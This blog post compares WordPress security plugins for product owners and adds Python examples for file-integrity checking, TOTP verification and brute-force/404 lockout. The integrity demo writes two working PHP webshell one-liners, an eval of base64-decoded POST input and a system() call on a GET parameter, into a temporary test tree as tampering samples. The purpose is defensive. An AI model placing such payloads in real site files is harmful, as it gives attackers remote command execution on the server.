4 Jan 2019 - Ian Lebbern

The Product Owner's Guide To WordPress Security Plugins


If you’re a product owner who’s been handed responsibility for your company’s WordPress site, or sites, you know you have quite a bit to handle. New pages to create, new blog posts to write, and just the work of keeping things up and running. You’re also responsible for the security of the site.

WordPress has seen its fair share of security issues over the years, which may make security for your WordPress site seem like a big challenge. Thankfully, it doesn’t have to be. We’re here to help you figure out the best way to secure your WordPress site.

Security plugins for WordPress have multiplied, and the good ones bundle features that make securing your site much easier than working it all out yourself. Let's look at what features you should consider when shopping for a WordPress security plugin.

What Does a Good WordPress Security Plugin Look Like?

The best security plugins for WordPress share many features. Here’s what to look for when shopping for a plugin that will help you establish security best practices for your site.

Protecting the Admin Features

The administrator dashboard of a WordPress site is a juicy target for attackers. The best plugins protect this area by enforcing strong passwords, limiting login attempts, and detecting when an attacker is trying passwords at random, known as a brute-force attack. Changing the default login URL (/wp-login.php) keeps automated scanners from finding the form as easily, but treat it as a convenience rather than a control: it does nothing against an attacker who already knows the new path, so it does not replace lockouts and two-factor authentication.

Malware Detection

Attackers often try to add malicious code, known as "malware," to your WordPress site without your knowledge. This extra code can open your server up to further attack or let attackers change the content on your site. Malware detection is a must, since running someone else's code on your server is about as bad as it gets. The best plugins scan for malware automatically on a schedule, although scheduled scanning often requires upgrading to the paid version. Keep in mind that scanners match known patterns, so a clean scan lowers the odds of an infection but does not prove there is none.

File Change Detection

A common avenue of attack is modifying the core files that make your WordPress site run. If that code is changed, an attacker can keep operating without being noticed: the change can open back doors and alter the fundamental way your site works. The best plugins compare the core WordPress files against the known-good checksums published by WordPress.org and report any file that has been changed, added, or removed without your knowledge.
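The baseline-and-verify check behind file change detection, as an added example (not the code of any plugin on this page). It hashes every file under a directory, stores the result as a manifest, and later reports files that were modified, added, or removed. The WordPress install it checks is a tiny constructed tree in a temporary directory, and the "backdoor" and "webshell" it plants are inert strings written to that tree for the demonstration.

```python
"""Baseline-and-verify file integrity check of the kind a WordPress security
plugin runs over core files. Added example, not code from any plugin
discussed on this page. The directory layout and file contents in demo()
are constructed for illustration."""
import hashlib
import os
import tempfile


def hash_file(path):
    """SHA-256 of a file, read in chunks so large files are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map every file under root (relative path -> digest)."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def verify(root, baseline):
    """Compare the current tree against a trusted baseline manifest.

    Returns sorted lists under 'modified', 'added' and 'missing'. Added files
    matter as much as modified ones: a webshell dropped beside the core files
    is a new file, not a changed one."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Simulate a clean install, take a baseline, tamper with it, re-verify."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-includes"))
        clean = {  # constructed stand-ins for two core files
            "index.php": b"<?php require __DIR__ . '/wp-blog-header.php';\n",
            "wp-includes/functions.php": b"<?php // core functions\n",
        }
        for rel, data in clean.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        baseline = build_manifest(root)

        # Tampering: a backdoor appended to a core file, and a webshell added
        # as a new file with an innocuous-looking name.
        with open(os.path.join(root, "wp-includes", "functions.php"), "ab") as fh:
            fh.write(b"eval(base64_decode($_POST['c']));\n")
        with open(os.path.join(root, "wp-includes", "cache.php"), "wb") as fh:
            fh.write(b"<?php system($_GET['cmd']);\n")

        return verify(root, baseline)


if __name__ == "__main__":
    print(demo())
```

A manifest stored on the same server is only as trustworthy as the server: an attacker who can write core files can rewrite the manifest too. That is why plugins check core files against the checksums WordPress.org publishes for each release (WP-CLI exposes the same check as `wp core verify-checksums`), and why any baseline you keep for plugin and theme files belongs somewhere the web server cannot write.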

Security Alerts

If something bad does happen to your site, alerts are essential so your team can respond and remove the threat. Most plugins can send email alerts, so you find out when an attack may be in progress rather than weeks later when a customer reports a defaced page.

IP Address Blocking

An IP address is a computer's address on the Internet. Many security plugins block addresses of known-bad hosts, and some can block entire countries. Think of it as blocking a spam caller on your cell phone: once a number is blocked, your carrier doesn't put it through, and once an IP address is blocked, the plugin refuses connections from it. Two caveats: attackers rotate through proxies and compromised machines, so blocklists always lag behind them, and a country block also turns away legitimate visitors and services (a remote colleague, a monitoring service) that happen to sit in that country.

Database Backup

Your database holds user accounts, posts, pages, comments, and settings; plugin and theme code and uploaded media live as files on disk, so a complete backup needs both the database and the wp-content directory. Many security plugins offer automatic database backups so that if the database is corrupted or wiped out, the site can be restored quickly. Keep the backups somewhere the web server cannot write to: a backup stored beside the site is lost in the same incident that destroys the site.

Two-Factor Authentication

Two-factor authentication (2FA) means requiring a second, independent proof of identity in addition to the password. When your bank texts you a code that you type in after entering your password, you're using 2FA. The best security plugins let you turn 2FA on for the admin dashboard, usually with a code from an authenticator app, which is stronger than a text message because SMS codes can be intercepted or redirected through SIM swapping. The effect is that an attacker who guesses or steals the admin password still can't get in without the second factor.
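What the server-side check behind an authenticator-app code looks like, as an added example (not the code of any plugin on this page): RFC 6238 TOTP, with the usual allowance for clock drift and a guard against replaying a code that was already accepted. The secret used is the RFC 4226/6238 test-vector secret so the output can be checked against the RFC; a real deployment generates a random secret per user.

```python
"""RFC 6238 TOTP check of the kind a WordPress 2FA plugin runs on a code from
an authenticator app. Added example, not code from any plugin on this page.
SECRET is the RFC 4226/6238 test-vector secret, used only so the values can
be checked against the RFC."""
import hashlib
import hmac
import struct
import time

SECRET = b"12345678901234567890"  # RFC test vector; never use a fixed secret


def hotp(secret, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the counter, dynamic truncation, modulo 10^d."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, for_time, step=30, digits=6):
    """RFC 6238: HOTP with the counter derived from Unix time."""
    return hotp(secret, int(for_time) // step, digits)


def verify_totp(secret, submitted, for_time=None, step=30, skew=1, last_counter=None):
    """Check a submitted code.

    Accepts the current step and `skew` steps either side to tolerate clock
    drift, but refuses any counter at or below `last_counter` so a code that
    already logged someone in cannot be replayed inside its validity window.
    Returns the accepted counter (store it as the new last_counter) or None.
    The comparison is constant-time so timing does not leak matching digits."""
    if for_time is None:
        for_time = time.time()
    counter = int(for_time) // step
    for delta in range(-skew, skew + 1):
        candidate = counter + delta
        if last_counter is not None and candidate <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, candidate), submitted):
            return candidate
    return None
```

The two details that matter in practice are both in `verify_totp`: the skew window is what keeps a phone whose clock is a few seconds off from being locked out, and the `last_counter` check is what stops the same six digits from being reused by someone who shoulder-surfed or phished them within the same 30-second step.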

These are the basic features that many of the best plugins share. Let’s now look at what each plugin offers that may be unique.

Comparing The Best WordPress Security Plugins

WordPress security plugins are numerous. We’ve compiled a list of the best ones for you to consider so you don’t have to wade through the noise. Let’s see what sets them apart.

Sucuri Security

Sucuri Security has a WordPress plugin that helps websites prevent attacks, detect attacks, and clean up the mess after an attack.

Sucuri's plugin hardens your WordPress site against attack. Hardening means applying preventive measures at the places attackers are most likely to target.

One feature that sets Sucuri apart is help recovering from an attack, if the worst happens. If your site is hacked, the Sucuri plugin will:

  1. Reset your security keys (the salts in wp-config.php), which invalidates every existing login cookie, including the attacker's
  2. Generate new random passwords for user accounts that may have been compromised
  3. Reset and re-install plugins that may have been infected with malware
  4. Show you all plugins and themes that should be updated

Sucuri thinks of your site before and after the hack, giving it the feel of a security partner, not just a vendor with a plugin.

iThemes Security

iThemes Security’s plugin features many of the basic requirements. It also has the added feature of performing a security check on your site upon installation. This lets you know how well your site is protected right now and what steps you can take to make it more secure.

Other nice features of iThemes Security are away mode and 404 detection. Away mode lets you lock down the admin login so the WordPress dashboard is not reachable 24 hours a day: if nobody makes changes overnight, you set the hours during which logins are allowed.

A "404" is the error code returned when a page doesn't exist. If these errors occur more often than normal from one address, it's a sign that an automated scanner is probing your site for the admin dashboard, backup files, or other vulnerable pieces. 404 detection automatically blocks the offending IP address once it crosses a threshold; set that threshold high enough that a legitimate visitor following a few dead links isn't locked out.
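The same sliding-window counter underlies both the brute-force detection described under admin protection above and the 404 detection described here, so one added example covers both (it is not the code of iThemes Security or any other plugin on this page). It parses constructed access-log lines, counts failed logins and 404s per IP inside a trailing window, and reports which addresses crossed each threshold. The log lines, IPs, paths and thresholds are all made up for the illustration.

```python
"""Sliding-window lockout of the kind behind the brute-force detection and
404 detection features described above. Added example, not code from any
plugin on this page; the log lines, IPs and thresholds are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed common-log-format lines: one IP hammering the login form, one
# scanning for files that don't exist, one ordinary user who mistyped once.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jan/2019:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3521
203.0.113.5 - - [04/Jan/2019:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3521
203.0.113.5 - - [04/Jan/2019:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3521
203.0.113.5 - - [04/Jan/2019:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3521
203.0.113.5 - - [04/Jan/2019:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 200 3521
192.0.2.9 - - [04/Jan/2019:10:00:20 +0000] "POST /wp-login.php HTTP/1.1" 200 3521
192.0.2.9 - - [04/Jan/2019:10:00:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0
192.0.2.9 - - [04/Jan/2019:10:00:41 +0000] "GET /wp-admin/ HTTP/1.1" 200 9012
198.51.100.7 - - [04/Jan/2019:10:01:00 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:01 +0000] "GET /backup.zip HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:02 +0000] "GET /wp-config.php.bak HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:03 +0000] "GET /administrator/ HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:04 +0000] "GET /.env HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:05 +0000] "GET /db.sql HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:06 +0000] "GET /wp-content/uploads/shell.php HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:07 +0000] "GET /admin/ HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:08 +0000] "GET /.git/config HTTP/1.1" 404 210
198.51.100.7 - - [04/Jan/2019:10:01:09 +0000] "GET /old/wp-login.php HTTP/1.1" 404 210
192.0.2.9 - - [04/Jan/2019:10:01:30 +0000] "GET /old-page/ HTTP/1.1" 404 210
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)


def parse(line):
    """Parse one access-log line into a dict; returns None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


class SlidingWindow:
    """Per-IP event counter over a trailing window. hit() returns True once an
    IP reaches the limit, which is the point where a plugin locks it out."""

    def __init__(self, limit, window_seconds):
        self.limit = limit
        self.window = window_seconds
        self.events = defaultdict(deque)

    def hit(self, ip, ts):
        q = self.events[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > self.window:
            q.popleft()
        return len(q) >= self.limit


def failed_login(e):
    # Assumption: WordPress answers a failed login by re-rendering the form
    # (200) and a successful one with a redirect (302).
    return e["method"] == "POST" and e["path"] == "/wp-login.php" and e["status"] == 200


def not_found(e):
    return e["status"] == 404


def analyze(log_text):
    """Run both rules over the log; returns {rule name: sorted blocked IPs}."""
    rules = [
        ("login_bruteforce", failed_login, SlidingWindow(5, 300)),  # 5 fails / 5 min
        ("404_scan", not_found, SlidingWindow(10, 60)),            # 10 misses / 1 min
    ]
    blocked = {name: set() for name, _, _ in rules}
    for line in log_text.splitlines():
        e = parse(line)
        if e is None:
            continue
        for name, matches, window in rules:
            if matches(e) and window.hit(e["ip"], e["ts"]):
                blocked[name].add(e["ip"])
    return {name: sorted(ips) for name, ips in blocked.items()}
```

Calling `analyze(SAMPLE_LOG)` flags 203.0.113.5 for the login rule and 198.51.100.7 for the 404 rule, while 192.0.2.9, who failed once and then logged in, is left alone. The thresholds are the knobs a product owner actually turns in a plugin's settings: too low and a colleague who forgets a password gets locked out alongside the attacker, too high and a slow, patient brute force slips under the window.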

Wordfence Security

Wordfence Security's plugin acts as a web application firewall for your WordPress site. A firewall is software that inspects the traffic coming into your site and rejects anything that looks like an attack. Rather than relying on a separate service, Wordfence offers a firewall built specifically for WordPress.

Figure: firewall diagram

Wordfence works by running its code before anything else on your site when a request comes in (its extended protection mode hooks PHP's auto_prepend_file setting, so the check runs before WordPress itself loads). Once a request is deemed safe, the plugin hands it off to the core WordPress code for processing. If an attack is suspected, the request is blocked, logged, and an alert is sent. Think of it as a bouncer that checks visitors for malicious behaviour before letting them in. One limit to keep in mind: a plugin-level firewall only sees traffic that reaches PHP, so it can't protect the web server or hosting layer underneath it.

All In One WP Security & Firewall

All In One WordPress Security & Firewall is a plugin with many of the same features we’ve discussed. What sets All In One apart from the others are the usability features it holds.

The dashboards and visuals in All In One are a great way to learn the status of your site's security at a glance. The security strength meter shows a score based on how many recommended features you've activated; it measures how much of the plugin you have turned on, not whether your site is actually free of malware.

Figure: security strength pie chart

One of the challenges of securing a WordPress site is making sure security changes don’t interfere with the functionality or availability of your site. All In One labels its suggested security fixes as “basic”, “intermediate”, and “advanced”. These labels help you to progressively increase the security of your site without breaking it. You start with the basic changes to prevent the most common attacks, then slowly ramp up to the intermediate and advanced changes when you and your development team are ready. You can use your strength gauge to help you decide where to go next.

Making security user friendly is a huge help in convincing users to secure their sites. All In One’s focus on making security changes easier and less risky is a big plus.

SecuPress

SecuPress includes many of the features we've discussed. It also has a number of unique features, some free and some requiring an upgrade to the Pro version.

One useful free feature of SecuPress is protection of your security keys. SecuPress generates the keys when they are needed rather than leaving them stored in a file on your site, so an attacker who manages to read your configuration doesn't get them for free.

Another useful feature, part of the Pro offering, is detecting themes and plugins that may be vulnerable: an outdated version, or code that has been tampered with to include malware. Many attackers start by looking for a vulnerable plugin on your site, so SecuPress warns you when it spots attempts to get in through one. You can then update the plugin, or reset and re-install any that may have been compromised.

SecuPress also helps site owners understand where their site could be vulnerable. Its scanner checks your site's URLs and other settings to make sure poor configuration isn't putting the site at risk. Scans like these are a great way to find "low-hanging fruit" and fix it.

The Right Security Plugin Makes All the Difference

Securing your WordPress site is very important in today's environment. You can't let your guard down, but you can't ignore content and feature development either. These plugins are user friendly and feature rich, and all are good choices. Make the best choice for your site so you can reap the benefits of the powerful WordPress platform.

We hope we've helped guide you toward the best options and why they may work for you. If you need help finding the right plugin for your needs, please don't hesitate to get in touch.
